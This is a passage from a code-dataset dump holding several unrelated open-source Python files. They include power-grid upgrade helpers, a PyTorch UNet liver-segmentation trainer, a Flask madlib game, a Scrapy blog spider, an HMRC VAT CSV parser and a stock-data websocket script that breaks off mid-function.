duplicates_final = pd.concat([duplicates_final.set_index(\"final_equipment_name\"), og], axis=1).reset_index()\r\n \r\n # keep all non-duplicated\r\n final_line_upgrades_df = line_upgrades_df.loc[~(line_upgrades_df[\"final_equipment_name\"].isin(duplicate_equip))]\r\n final_line_upgrades_df = pd.concat([final_line_upgrades_df, duplicates_final])\r\n return final_line_upgrades_df\r\n \r\n \r\ndef remove_duplicate_transformer_upgrades(xfmr_upgrades_df):\r\n if xfmr_upgrades_df.empty:\r\n return xfmr_upgrades_df\r\n upgrades_subset = xfmr_upgrades_df.loc[xfmr_upgrades_df[\"action\"] == \"add\"]\r\n duplicate_equip = list(upgrades_subset[upgrades_subset.final_equipment_name.duplicated()].final_equipment_name.unique())\r\n if not duplicate_equip:\r\n return xfmr_upgrades_df\r\n upgrades_subset = upgrades_subset.groupby('final_equipment_name', group_keys=False).apply(lambda df: df.fillna(method='ffill'))\r\n upgrades_subset = upgrades_subset.loc[upgrades_subset[\"final_equipment_name\"].duplicated(keep=False)]\r\n duplicates_final = upgrades_subset.loc[upgrades_subset[\"upgrade_type\"] == \"upgrade\"]\r\n duplicates_final = duplicates_final.sort_values(\"kVA\", ascending=False)\r\n duplicates_final = 
duplicates_final.drop_duplicates(subset=[\"upgrade_type\", \"action\", \"final_equipment_name\"], keep=\"first\") # drop any duplicate rows, keeping highest rating\r\n duplicates_final[\"upgrade_type\"] = \"new_parallel\"\r\n duplicates_final = duplicates_final.drop(columns=\"original_equipment_name\")\r\n # get original equipment name : \r\n og = upgrades_subset.loc[upgrades_subset[\"upgrade_type\"] == \"new_parallel\"].set_index(\"final_equipment_name\")[[\"original_equipment_name\"]]\r\n duplicates_final = pd.concat([duplicates_final.set_index(\"final_equipment_name\"), og], axis=1).reset_index()\r\n \r\n # keep all non-duplicated\r\n final_xfmr_upgrades_df = xfmr_upgrades_df.loc[~(xfmr_upgrades_df[\"final_equipment_name\"].isin(duplicate_equip))]\r\n final_xfmr_upgrades_df = pd.concat([final_xfmr_upgrades_df, duplicates_final])\r\n return final_xfmr_upgrades_df\r\n\r\n\r\ndef get_pv_buses(dss):\r\n pv_buses = []\r\n flag = dss.PVsystems.First()\r\n while flag > 0:\r\n pv_buses.append(dss.Properties.Value('bus1').split('.')[0])\r\n flag = dss.PVsystems.Next()\r\n return pv_buses\r\n\r\n\r\ndef get_load_buses(dss):\r\n load_buses = []\r\n flag = dss.Loads.First()\r\n while flag > 0:\r\n load_buses.append(dss.Properties.Value('bus1').split('.')[0])\r\n flag = dss.Loads.Next()\r\n return load_buses\r\n\r\n\r\ndef get_bus_coordinates():\r\n \"\"\"This function creates a dataframe of all buses in the circuit with their x and y coordinates\r\n\r\n Returns\r\n -------\r\n\r\n \"\"\"\r\n all_bus_names = dss.Circuit.AllBusNames()\r\n buses_list = []\r\n for b in all_bus_names:\r\n bus_dict = {}\r\n dss.Circuit.SetActiveBus(b)\r\n bus_dict['bus_name'] = b.lower()\r\n bus_dict['x_coordinate'] = dss.Bus.X()\r\n bus_dict['y_coordinate'] = dss.Bus.Y()\r\n buses_list.append(bus_dict)\r\n bus_coordinates_df = pd.DataFrame(buses_list)\r\n if all(bus_coordinates_df[\"x_coordinate\"].unique() == [0]) and all( bus_coordinates_df[\"y_coordinate\"].unique() == [0]):\r\n logger.info(\"Buscoordinates not provided for feeder model.\")\r\n return bus_coordinates_df\r\n\r\n\r\ndef convert_summary_dict_to_df(summary_dict):\r\n df = pd.DataFrame.from_dict(summary_dict, orient='index')\r\n df.index.name = \"stage\"\r\n return df\r\n\r\n\r\ndef filter_dictionary(dict_data, wanted_keys):\r\n return {k: dict_data.get(k, None) for k in wanted_keys}\r\n\r\n\r\ndef compare_dict(old, new, properties_to_check=None):\r\n \"\"\"function to compare two dictionaries with same format. 
\r\n Only compares common elements present in both original and new dictionaries\r\n \r\n \"\"\"\r\n field_list = []\r\n change = {}\r\n sharedKeys = set(old.keys()).intersection(new.keys())\r\n if not sharedKeys: # if there are no shared keys, then exit function\r\n return change\r\n all_properties = old[list(sharedKeys)[0]].keys()\r\n if properties_to_check is None:\r\n # get all properties from first element of dictionary\r\n properties_to_check = all_properties\r\n else:\r\n properties_to_check = list(set(all_properties) & set(properties_to_check))\r\n for key in sharedKeys:\r\n change_flag = False\r\n for sub_field in properties_to_check:\r\n if pd.isna(old[key][sub_field]) and pd.isna(new[key][sub_field]):\r\n continue\r\n if old[key][sub_field] != new[key][sub_field]:\r\n change_flag = True\r\n field_list.append(sub_field)\r\n if change_flag:\r\n change[key] = field_list\r\n return change\r\n\r\n\r\ndef create_timepoint_multipliers_dict(timepoint_multipliers):\r\n \"\"\"Creates a dictionary with new load rating, for every property and multiplier.\r\n Currently, it only does this for loads. But can be modified to accommodate other elements like PV as well.\r\n In raw_dict, value can be accessed as follows:\r\n value = raw_dict[property_name][object_name][multiplier_name]\r\n \r\n In reformatted_dict (which is returned from this function), value can be accessed as follows:\r\n value = raw_dict[object_name][property_name][multiplier_name]\r\n This value will need to be assigned to the object and run.\r\n This hasnt been used yet.\r\n \r\n Returns\r\n -------\r\n dict\r\n \"\"\"\r\n for field in timepoint_multipliers.keys():\r\n if field == \"load_multipliers\":\r\n property_list = [\"kW\"]\r\n object_name = \"Load\"\r\n multiplier_list = []\r\n # get combined list of multipliers\r\n for key, value in timepoint_multipliers[field].items():\r\n multiplier_list = multiplier_list + value\r\n df = dss.utils.class_to_dataframe(object_name)\r\n df.reset_index(inplace=True)\r\n df['name'] = df['index'].str.split(\".\", expand=True)[1]\r\n name_list = list(df['name'].values)\r\n del df[\"index\"]\r\n df.set_index('name', inplace=True)\r\n raw_dict = {}\r\n for property in property_list:\r\n logger.debug(property)\r\n df[property] = df[property].astype(float)\r\n new_df = pd.DataFrame(index=name_list, columns=multiplier_list)\r\n new_df.index.name = 'name'\r\n for multiplier in multiplier_list:\r\n logger.debug(multiplier)\r\n new_df[multiplier] = df[property] * multiplier\r\n raw_dict[property] = new_df.T.to_dict()\r\n # reformat dictionary to create desired format\r\n reformatted_dict = {}\r\n for name in name_list:\r\n reformatted_dict[name] = {}\r\n for property in property_list:\r\n reformatted_dict[name][property] = raw_dict[property][name]\r\n else:\r\n raise Exception(f\"Timepoint multiplier has Unsupported key: {field}. Presently, key 'load_multipliers' is supported.\")\r\n return reformatted_dict\r\n\r\n\r\n@track_timing(timer_stats_collector)\r\ndef apply_timepoint_multipliers_dict(reformatted_dict, multiplier_name, property_list=None, field=\"load_multipliers\",\r\n **kwargs):\r\n \"\"\"This uses a dictionary with the format of output received from create_timepoint_multipliers_dict\r\n Currently, it only does works loads. 
But can be modified to accommodate other elements like PV as well.\r\n\r\n In input dict: value can be accessed as follows:\r\n value = raw_dict[object_name][property_name][multiplier_name]\r\n In this function, value will be assigned to corresponding property and run.\r\n This hasnt been used yet.\r\n \r\n Returns\r\n -------\r\n dict\r\n \"\"\"\r\n name_list = list(reformatted_dict.keys())\r\n if property_list is None:\r\n property_list = list(reformatted_dict[name_list[0]].keys())\r\n if field == \"load_multipliers\":\r\n flag = dss.Loads.First()\r\n while flag > 0:\r\n flag = dss.Loads.Next()\r\n name = dss.Loads.Name()\r\n if name not in name_list: # if load name is not present in dictionary keys, continue\r\n continue\r\n for property in property_list:\r\n value = reformatted_dict[name][property][multiplier_name]\r\n if property == \"kW\":\r\n dss.Loads.kW(value)\r\n else:\r\n raise Exception(f\"Property {property} not defined in multipliers dict\")\r\n circuit_solve_and_check(raise_exception=True, **kwargs)\r\n else:\r\n raise Exception(f\"Unsupported key in dictionary. Presently, load_multipliers is supported.\")\r\n return reformatted_dict\r\n\r\n\r\ndef apply_uniform_timepoint_multipliers(multiplier_name, field, **kwargs):\r\n \"\"\"This function applies a uniform mulitplier to all elements. \r\n Currently, the multiplier only does works on loads. But can be modified to accommodate other elements like PV as well.\r\n It has two options, 1) all pv is enabled. 2) all pv is disabled.\r\n \r\n Returns\r\n -------\r\n bool\r\n \"\"\"\r\n if field == \"with_pv\":\r\n check_dss_run_command(\"BatchEdit PVSystem..* Enabled=Yes\")\r\n elif field == \"without_pv\": \r\n check_dss_run_command(\"BatchEdit PVSystem..* Enabled=No\")\r\n else:\r\n raise Exception(f\"Unknown parameter {field} passed in uniform timepoint multiplier dict.\"\r\n f\"Acceptable values are 'with_pv', 'without_pv'\")\r\n check_dss_run_command(f\"set LoadMult = {multiplier_name}\")\r\n circuit_solve_and_check(raise_exception=True, **kwargs)\r\n return True\r\n","repo_name":"NREL/disco","sub_path":"disco/extensions/upgrade_simulation/upgrades/common_functions.py","file_name":"common_functions.py","file_ext":"py","file_size_in_byte":92378,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"35489171752","text":"import pandas as pd\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\n\nif len(sys.argv) < 3:\n print(\"usage: plot.py input.json output.png\")\njson_handle = sys.argv[1]\npng_handle = sys.argv[2]\nstock_data = pd.read_json(json_handle)\ny = stock_data['stock_percent'].T.values\nprint(y)\nprint(len(y))\nx = range(0, len(y))\nplt.plot(x, y, '')\nplt.savefig(png_handle)\n","repo_name":"jackylee/hsgt","sub_path":"hkex/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74170649169","text":"# pytorch_playground\nimport torch\nfrom torch.autograd import Variable\n# torchvision\nfrom torchvision import datasets\nfrom torch.utils.data.sampler import SubsetRandomSampler\nfrom torchvision import transforms\n# more\nimport numpy as np\nimport copy\n\n\nimage_size = 224\n\nnormalize = transforms.Normalize(\n mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225]\n )\n\ntransform_train = transforms.Compose([\n transforms.Resize(image_size),\n transforms.CenterCrop(image_size),\n transforms.ToTensor(),\n 
normalize\n])\n\ntransform_test = transforms.Compose([\n transforms.Resize(image_size),\n transforms.CenterCrop(image_size),\n transforms.ToTensor(),\n normalize\n])\n\ndef test_set(testset_path):\n test_dataset = datasets.ImageFolder(testset_path, transform_test)\n test_loader = torch.utils.data.DataLoader(test_dataset,\n batch_size=20,\n num_workers=1)\n return test_loader\n\ndef train_set_test_set(\n dataset_path,\n batch_size=1,\n val_set_ratio=0.3,\n random_seed=None,\n # image_size=224,\n num_workers=2\n):\n\n # trainset_path = dataset_path + 'train'\n trainset_path = dataset_path\n # testset_path = dataset_path + 'test'\n\n dataset_train = datasets.ImageFolder(trainset_path, transform_train)\n dataset_val = datasets.ImageFolder(trainset_path, transform_test)\n # dataset_test = datasets.ImageFolder(testset_path, transform_test)\n\n num_data = len(dataset_train)\n indices = list(range(num_data))\n split = int(np.floor(val_set_ratio * num_data))\n if random_seed:\n print('random seed is:', random_seed)\n np.random.seed(random_seed)\n np.random.shuffle(indices)\n np.random.seed()\n else:\n print('These is no random seed given.')\n np.random.shuffle(indices)\n\n train_idx, valid_idx = indices[split:], indices[:split]\n\n train_sampler = SubsetRandomSampler(train_idx)\n valid_sampler = SubsetRandomSampler(valid_idx)\n\n train_loader = torch.utils.data.DataLoader(\n dataset_train,\n batch_size=batch_size,\n sampler=train_sampler,\n num_workers=num_workers\n )\n\n val_loader = torch.utils.data.DataLoader(\n dataset_val,\n batch_size=batch_size,\n sampler=valid_sampler,\n num_workers=num_workers\n )\n\n dataset_loaders = {\n 0: train_loader,\n 1: val_loader,\n # 'test': test_loader\n }\n dataset_sizes = {\n 'train': len(train_idx),\n 'val': len(valid_idx),\n # 'test': len(test_idx)\n }\n dataset_classes = dataset_train.classes\n\n return dataset_loaders, dataset_sizes, dataset_classes\n\n","repo_name":"humorbeing/python_github","sub_path":"__OLD_CODE_STORAGE/attention_RL/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22655324253","text":"import random\nimport art\nprint(art.logo)\ncards = [11, 2, 3, 4, 5, 5, 7, 8, 9, 10]\n\n\ndef shri():\n m = []\n a = [random.choice(cards)]\n\n m.append(random.choice(cards))\n maggy = False\n while not maggy:\n\n m.append(random.choice(cards))\n\n print(f\"your cards {m} {sum(m)}\")\n print(f\"Computer card is{a}\")\n if input('enter \"y\" to get another card or \"n\"') == \"n\":\n maggy = True\n if 11 in m and sum(m) > 21:\n s = m.index(11)\n\n m[s] = 1\n\n maharshi = False\n while not maharshi:\n if 11 in a and sum(a) > 21:\n h = a.index(11)\n a[h] = 1\n\n if sum(a) < 17:\n a.append(random.choice(cards))\n else:\n maharshi = True\n\n print(f\"computer cards{a} {sum(a)}\")\n\n if sum(m) > 21 and sum(a) > 21 or sum(a) == sum(m):\n print(\"Draw\")\n elif sum(a) > 21:\n print(\"you win\")\n elif sum(m) > 21:\n print(\"you lose\")\n elif sum(m) > sum(a):\n print(\"you win\")\n else:\n print('you lose')\n if input(\"enter 'y' to play again 'n' to exit\") == 'y':\n shri()\n\n\nshri()\n","repo_name":"vsdeshinge/python","sub_path":"blackjack/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"38507609994","text":"\nimport numpy as np\nimport re\nimport pandas as pd\nimport sqlite3 as 
sql\n\nclass Access:\n def __init__(self, dbName):\n self.dbConn = sql.connect(dbName)\n self.cursor = self.dbConn.cursor()\n def __del__(self):\n self.dbConn.close()\n def extract(self):\n dataDf = pd.read_sql_query(\"SELECT * FROM `barcode`\", con = self.dbConn)\n return dataDf\nclass Store:\n def __init__(self, dbName):\n self.dbConn = sql.connect(dbName)\n self.cursor = self.dbConn.cursor()\n def store(self, data):\n dataDF = pd.DataFrame(data)\n try:\n dataDF.to_sql(\"barcode\", self.dbConn, if_exists='append', index = False)\n except ValueError as error:\n print(\"Failed to insert:\", error)\n self.dbConn.commit()\n def __del__(self):\n self.dbConn.close()\n\n\nif __name__ == \"__main__\":\n while True:\n barIn = \"false\"\n while not barIn.isnumeric():\n barIn = input()\n data = {\"barcode\" : [barIn]}\n\n store = Store(\"someDB.db\")\n store.store(data)\n\n extract = Access(\"someDB.db\")\n print(extract.extract())\n ","repo_name":"oycheng/Aggie-Reuse-Storefront","sub_path":"frontend/databaseAccess.py","file_name":"databaseAccess.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36691136242","text":"# Insert the following into Nuke's menu.py, e.g. the one on your server/global\n# one all artists refer to. For personal testing, your home folder's \n# .nuke/menu.py would be sufficient\n\n# ------------------------- BEGIN ----------------------------------------------\n# State the directory to the root folder of the pipeline system code repository\n# This will be error checked\npipelineSysDir = \"D:/PipelineSystem/\"\nif os.path.isdir(pipelineSysDir):\n os.sys.path.append(\"D:/PipelineSystem/\")\nelse:\n pathNotExistErrMsg = \"Pipeline System folder, {}, does not exist or \" \\\n \"currently unavailable\".format(pipelineSysDir)\n nuke.message(pathNotExistErrMsg)\n raise OSError(pathNotExistErrMsg)\n\n# Next import the nuke modules from the pipeline system, run tests if chosen\nimport ps_nuke\nif nuke.ask(\"Run tests?\"):\n ps_nuke.runUnitTests()\n\n# Then initialize the pipeline system for Nuke\nps_nuke.initialize()\n# --------------------------- END ----------------------------------------------\n","repo_name":"j0yu/TDD-for-CG","sub_path":"ps_nuke/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"66"} +{"seq_id":"35489206649","text":"#!/usr/bin/env python37\n# -*- coding:utf-8 -*-\n# author:Luqueli@wisers.com time:2021/9/7\n\nimport urllib.request\nimport pandas as pd\nfrom time import sleep\nimport os\n\n\ndef sheet_load(stock_num: list, sheet_type: str):\n for stock in stock_num:\n url = f'http://quotes.money.163.com/service/{sheet_type}_' + stock + '.html'\n while True:\n try:\n content = urllib.request.urlopen(url, timeout=2).read()\n # content = content.decode(\"gbk\").encode(\"utf-8\")\n file_path = './all_sheets/' + stock + '_' + f'{sheet_type}.csv'\n if not os.path.isfile(file_path):\n empty_df = pd.DataFrame()\n empty_df.to_csv(file_path)\n with open(file_path, 'wb') as f:\n f.write(content)\n print(stock + '_' + f'{sheet_type}' + \"更新完成\")\n sleep(1)\n break\n except Exception as e:\n if str(e) == 'HTTP Error 404: Not Found':\n break\n else:\n print(e)\n continue\n\n\nif __name__ == \"__main__\":\n stock_no = ['601012', '002027', '002304']\n for sheet_ty in ['lrb', 'xjllb', 'zcfzb']:\n sheet_load(stock_no, 
sheet_ty)\n","repo_name":"Luque0108/finance_report_project","sub_path":"data_download.py","file_name":"data_download.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17225868673","text":"def add1(a, b):\n result = a + b\n return result\n\n\nvalue = add1(1, 2)\nprint(\"add1()\", value)\n\n\n\n\ndef add2():\n result = 1 + 2\n return result\n\n\nvalue = add2()\nprint(\"add2()\", value)\n\n\n\n\n\ndef add3(a, b):\n result = a + b\n print(result)\n\n\nvalue = add3(3, 4)\nprint(\"add3()\", value) # 반환 값이 없으면 NONE\n\n\n\n\ndef add4():\n result = 3 + 6\n print(result)\n\nvalue = add4()\nprint(\"add4()\", value)","repo_name":"ikk5515/python_study","sub_path":"python1/week6/test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36524375073","text":"def intersection(a, b):\n if a == b:\n print(a)\n else:\n a = a.next\n b = b.next\n return a\n\nclass Node(object):\n def __init__(self, val):\n self.val = val\n self.next = None\n\n def prettyPrint(self):\n c = self\n while c:\n print(c.val)\n c = c.next\n\nptrA = Node(1)\nptrA.next = Node(2)\nptrA.next.next = Node(3)\nptrA.next.next.next = Node(4)\nprint('*'*40)\nprint('This is linked list for A nodes')\nptrA.prettyPrint()\nptrB = Node(6)\nptrB.next = ptrA.next.next\nprint('*'*40)\nprint('This is the linked list for B nodes')\nptrB.prettyPrint()\n#for each object in a, print a.val\n\nprint('*'*40)\nptrTmpAroot = ptrA\nwhile ptrTmpAroot:\n print(ptrTmpAroot.val)\n ptrTmpBroot = ptrB\n while ptrTmpBroot:\n print(ptrTmpBroot.val)\n if ptrTmpAroot == ptrTmpBroot:\n print('The intersection is ',ptrTmpAroot.val)\n ptrTmpBroot = ptrTmpBroot.next\n ptrTmpAroot = ptrTmpAroot.next\n\n\n\n#c = intersection(a, b)\n#c.prettyPrint()\n","repo_name":"Thyagaraja9573/Projects","sub_path":"linkedlist/linkedlist.py","file_name":"linkedlist.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"44119797343","text":"\"\"\"A madlib game that compliments its users.\"\"\"\n\nfrom random import choice\n\nfrom flask import Flask, render_template, request\n\n# \"__name__\" is a special Python variable for the name of the current module.\n# Flask wants to know this to know what any imported things are relative to.\napp = Flask(__name__)\n\nAWESOMENESS = [\n \"awesome\",\n \"terrific\",\n \"fantastic\",\n \"incredible\",\n \"wonderful\",\n \"smashing\",\n \"lovely\",\n]\n\n@app.route(\"/\")\ndef start_here():\n \"\"\"Display homepage.\"\"\"\n\n return render_template(\"gotohello.html\")\n\n\n@app.route(\"/hello\")\ndef say_hello():\n \"\"\"Say hello to user.\"\"\"\n\n return render_template(\"hello.html\")\n\n\n@app.route(\"/greet\")\ndef greet_person():\n \"\"\"Greet user with compliment.\"\"\"\n\n player = request.args.get(\"person\")\n\n compliment = choice(AWESOMENESS)\n # return render_template(\"compliment.html\", person=player, compliment=compliment)\n\n game_interest = request.args.get(\"game_interest\")\n\n if game_interest == \"on\":\n return render_template(\"game_form.html\")\n else:\n return render_template(\"goodbye.html\", person=player, compliment=compliment)\n\n@app.route(\"/game\")\ndef show_madlib_form():\n \"\"\"asks if wants to play game\"\"\"\n\n return render_template(\"game_form.html\")\n\n@app.route(\"/game_play\")\ndef 
show_madlib_result():\n\n color = request.args.get(\"color\")\n\n noun = request.args.get(\"noun\")\n\n person_madlib = request.args.get(\"person_madlib\")\n\n adjective = request.args.get(\"adjective\")\n\n animal = request.args.get(\"animal\")\n\n shape = request.args.get(\"shape\")\n\n sound = request.args.get(\"sound\")\n\n place = request.args.get(\"place\")\n \n return render_template(choice(['game.html', 'game1.html', 'game2.html']), color=color, noun=noun, person_madlib=person_madlib, adjective=adjective, animal=animal, shape=shape, sound=sound, place=place)\n\nif __name__ == \"__main__\":\n # Setting debug=True gives us error messages in the browser and also\n # \"reloads\" our web app if we change the code.\n\n app.run(debug=True, host=\"0.0.0.0\")\n","repo_name":"MegginS/Madlibs-11162021","sub_path":"madlibs.py","file_name":"madlibs.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"28673513369","text":"\"\"\"CSV data formats\"\"\"\n\nfrom contextlib import contextmanager\nimport csv\nfrom dataclasses import dataclass\nfrom datetime import date, datetime\nfrom typing import ClassVar\nfrom parsedatetime import Calendar\nfrom .tabular import (TabularTypeParser, TabularDataClass, TabularCommand,\n TabularVatReturn, TabularVatSubmitCommand,\n tabulardataclass)\n\n__all__ = [\n 'CsvTypeParser',\n 'CsvDataClass',\n 'CsvVatReturn',\n 'CsvCommand',\n 'CsvVatSubmitCommand',\n]\n\n\n@dataclass\nclass CsvTypeParser(TabularTypeParser):\n \"\"\"CSV type parser\"\"\"\n\n calendar: ClassVar[Calendar] = Calendar()\n \"\"\"Calendar object used for date parsing\"\"\"\n\n def __post_init__(self):\n if self.parse is None:\n if issubclass(self.pytype, datetime):\n self.parse = self.parse_datetime\n elif issubclass(self.pytype, date):\n self.parse = self.parse_date\n super().__post_init__()\n\n @classmethod\n def parse_datetime(cls, value):\n \"\"\"Parse datetime from CSV value\"\"\"\n timestamp, ret = cls.calendar.parseDT(value)\n if not ret:\n raise ValueError(\"Invalid date: '%s'\" % value)\n return timestamp\n\n @classmethod\n def parse_date(cls, value):\n \"\"\"Parse date from CSV value\"\"\"\n return cls.parse_datetime(value).date()\n\n\nclass CsvDataClass(TabularDataClass):\n \"\"\"CSV data class\"\"\"\n\n TypeParser = CsvTypeParser\n\n\n@tabulardataclass\nclass CsvVatReturn(CsvDataClass, TabularVatReturn):\n \"\"\"VAT return from CSV data\"\"\"\n\n\nclass CsvCommand(TabularCommand):\n \"\"\"CSV file command\"\"\"\n\n @classmethod\n def init_parser(cls, parser):\n super().init_parser(parser)\n parser.add_argument('filename', help=\"CSV file\")\n\n @contextmanager\n def data(self):\n with open(self.args.filename, encoding='utf8') as f:\n yield csv.reader(f)\n\n\nclass CsvVatSubmitCommand(CsvCommand, TabularVatSubmitCommand):\n \"\"\"Submit VAT return(s) from CSV file\"\"\"\n\n Row = CsvVatReturn\n","repo_name":"mcb30/hmrc","sub_path":"hmrc/plugins/csv.py","file_name":"csv.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"30867619869","text":"import torch\nfrom torchvision.transforms import transforms as T\nfrom unet import UNet\nfrom torch import optim\nfrom dataset import LiverDataset\nfrom torch.utils.data import DataLoader\n\n# 是否使用current cuda device or torch.device('cuda:0')\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nx_transform = T.Compose([\n 
T.ToTensor(),\n # 标准化至[-1,1],规定均值和标准差\n # torchvision.transforms.Normalize(mean, std, inplace=False)\n T.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])\n])\n# mask只需要转换为tensor\ny_transform = T.ToTensor()\n\n\ndef train_model(model, criterion, optimizer, dataload, num_epochs=20):\n for epoch in range(num_epochs):\n print('Epoch {}/{}'.format(epoch, num_epochs - 1))\n print('-' * 10)\n dataset_size = len(dataload.dataset)\n epoch_loss = 0\n step = 0 # minibatch数\n for x, y in dataload: # 分100次遍历数据集,每次遍历batch_size=4\n optimizer.zero_grad() # 每次minibatch都要将梯度(dw,db,...)清零\n inputs = x.to(device)\n labels = y.to(device)\n outputs = model(inputs) # 前向传播\n loss = criterion(outputs, labels) # 计算损失\n loss.backward() # 梯度下降,计算出梯度\n optimizer.step() # 更新参数一次:所有的优化器Optimizer都实现了step()方法来对所有的参数进行更新\n epoch_loss += loss.item() #loss.item()是为了取得一个元素张量的数值\n step += 1\n print(\"%d/%d,train_loss:%0.3f\" %\n (step, dataset_size // dataload.batch_size, loss.item()))\n print(\"epoch %d loss:%0.3f\" % (epoch, epoch_loss))\n # 保存模型参数\n torch.save(model.state_dict(), 'weights_%d.pth' % epoch)\n return model\n\n\n# 训练模型\ndef train():\n model = UNet(3, 1).to(device)\n batch_size = 4\n # 损失函数\n criterion = torch.nn.BCELoss()\n # 梯度下降\n # model.parameters():Returns an iterator over module parameters\n optimizer = optim.Adam(model.parameters())\n # 加载数据集\n liver_dataset = LiverDataset(\"data/train\",\n transform=x_transform,\n target_transform=y_transform)\n dataloader = DataLoader(liver_dataset,\n batch_size=batch_size,\n shuffle=True,\n num_workers=4)\n # DataLoader:该接口主要用来将自定义的数据读取接口的输出或者PyTorch已有的数据读取接口的输入按照batch size封装成Tensor\n # batch_size:how many samples per minibatch to load,这里为4,数据集大小400,所以一共有100个minibatch\n # shuffle:每个epoch将数据打乱,这里epoch=10。一般在训练数据中会采用\n # num_workers:表示通过多个进程来导入数据,可以加快数据导入速度\n train_model(model, criterion, optimizer, dataloader)\n\n\n# 测试\ndef test():\n model = UNet(3, 1)\n model.load_state_dict(\n torch.load(\n r\"/home/Wangling/MengLinzhi/LiverSegmentation/weights_19.pth\",\n map_location='cpu'))\n liver_dataset = LiverDataset(\"data/val\",\n transform=x_transform,\n target_transform=y_transform)\n dataloaders = DataLoader(liver_dataset) # batch_size默认为1\n model.eval()\n import matplotlib.pyplot as plt\n plt.ion()\n with torch.no_grad():\n for x, _ in dataloaders:\n y = model(x)\n img_y = torch.squeeze(y).numpy()\n plt.imshow(img_y)\n plt.pause(0.01)\n plt.show()\n\n\nif __name__ == '__main__':\n train()\n","repo_name":"Wesley273/LiverSegmentation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"28069323090","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom cnblog.items import *\nimport logging\n\n\nclass CnblogsSpider(scrapy.Spider):\n name = 'cnblogs'\n allowed_domains = ['www.cnblogs.com']\n blogurl = 'https://www.cnblogs.com/sitehome/p/{page}'\n\n def start_requests(self):\n yield scrapy.Request(url=self.blogurl.format(page=1), callback=self.parse, meta={'page': 1})\n\n def parse(self, response):\n logging.info('process:' + response.url)\n post_items = response.css('#post_list > .post_item')\n if post_items and len(post_items):\n for post_item in post_items:\n item = CnblogItem()\n item['title'] = post_item.css('div.post_item_body > h3 > a::text').extract_first().strip()\n item['author'] = post_item.css('div.post_item_body > div > a::text').extract_first().strip()\n item['release_time'] = ''.join(post_item.css('div.post_item_body > 
div::text').extract()).strip()\n item['comments'] = post_item.css(\n 'div.post_item_body > div > span.article_comment > a::text').extract_first().strip()\n item['view'] = post_item.css(\n 'div.post_item_body > div > span.article_view > a::text').extract_first().strip()\n item['summary'] = ''.join(post_item.css('div.post_item_body > p::text').extract()).strip()\n yield item\n if response.css('#paging_block > div > a:last-child::text').extract_first().strip() == 'Next >':\n page = response.meta.get('page') + 1\n yield scrapy.Request(url=self.blogurl.format(page=page), callback=self.parse, meta={'page': page})","repo_name":"lijinye/cnblog","sub_path":"cnblog/spiders/cnblogs.py","file_name":"cnblogs.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74546469649","text":"from fyers_api.Websocket import ws\nfrom fyers_api import fyersModel\n\nfrom pprint import pprint\nfrom flask import Flask, request\nimport threading\n\napp = Flask(__name__)\n\ntokenMapping = {}\nltpDict = {}\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello World'\n\n\n@app.route('/ltp')\ndef get_ltp():\n global ltpDict\n print(ltpDict)\n ltp = -1\n instrument = request.args.get('instrument')\n try:\n ltp = ltpDict[instrument]\n except Exception as e:\n print(\"EXCEPTION occurred while getting ltpDict()\")\n print(e)\n return str(ltp)\n\n\ndef on_ticks(ticks):\n global ltpDict\n for tick in ticks:\n ltpDict[tick['symbol']] = tick['ltp']\n pprint(ltpDict)\n\n\ndef start_server():\n print(\"Inside startServer()\")\n app.run(host='0.0.0.0', port=4001)\n\n\ndef get_opt_instruments_list(fyers, symbol: str, expiry_str):\n strike_list = []\n instrument_list = []\n data = {\"symbols\": symbol}\n\n ltp = fyers.quotes(data=data)\n if ltp['code'] == 200:\n print(\"[Info] Last Trading Price: \", ltp['d'][0]['v'])\n\n strike = 0\n\n if ltp['code'] == 200 and ltp['d'][0]['s'] == 'ok':\n strike = ltp['d'][0]['v']['lp']\n else:\n raise ValueError(f\"[Err] {ltp['d'][0]['v']['code']} {ltp['d'][0]['v']['errmsg']}\")\n\n if ltp['code'] == '500':\n raise ConnectionError(ltp['data'])\n elif ltp['code'] == -15:\n raise ValueError(ltp['message'])\n elif ltp['code'] != 200:\n raise ValueError(ltp)\n\n if strike > 0:\n for i in range(-2, 2):\n strike = (int(strike / 100) + i) * 100\n strike_list.append(strike)\n if symbol == 'NSE:NIFTY50-INDEX':\n 